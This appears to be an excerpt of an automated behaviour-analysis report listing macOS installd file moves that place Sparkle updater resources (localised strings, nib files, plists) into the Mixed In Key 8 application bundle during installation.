Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ru.lproj/.BC.T_TFnuXi -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ru.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/cy.lproj/.BC.T_hk06xj -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/cy.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/.BC.T_p4iFRH -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/SUStatus.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/fr.lproj/.BC.T_heT8Ht -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/fr.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/fi.lproj/.BC.T_dZxiw8 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/fi.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/id.lproj/.BC.T_mutGJN -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/id.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/nl.lproj/.BC.T_0RcdsA -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/nl.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/th.lproj/.BC.T_GwygM6 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/th.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ro.lproj/.BC.T_zzCKXy -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ro.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ca.lproj/.BC.T_L6kSkD -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ca.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/.BC.T_qT9ha5 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/Sparkle.icns	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/.BC.T_67hLCP -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Info.plist	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/.BC.T_Eq8iGJ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/PkgInfo	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/.BC.T_M1s3Y5 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Info.plist	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/_CodeSignature/.BC.T_OggPHU -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/_CodeSignature/CodeResources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/.BC.T_bW8QPK -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/.BC.T_0gjA37 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/.BC.T_nMz5PE -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/.BC.T_lNG5I7 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/.BC.T_Fyuz5i -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/.BC.T_lZ55QE -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/.BC.T_HBiIrA -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUPasswordPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/.BC.T_xURfYw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/.BC.T_y9Kwb1 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/.BC.T_NQGwfh -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/.BC.T_F62Xyj -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/.BC.T_Y5ozo3 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/.BC.T_IofeuH -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/.BC.T_2hs0NC -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/.BC.T_akJC27 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/.BC.T_cX3GDu -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUPasswordPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/.BC.T_LRDebd -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/.BC.T_mRBf9c -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/.BC.T_jsQrlm -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/SUModelTranslation.plist	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/.BC.T_9UrqU3 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/Sparkle.strings	Jump to behavior
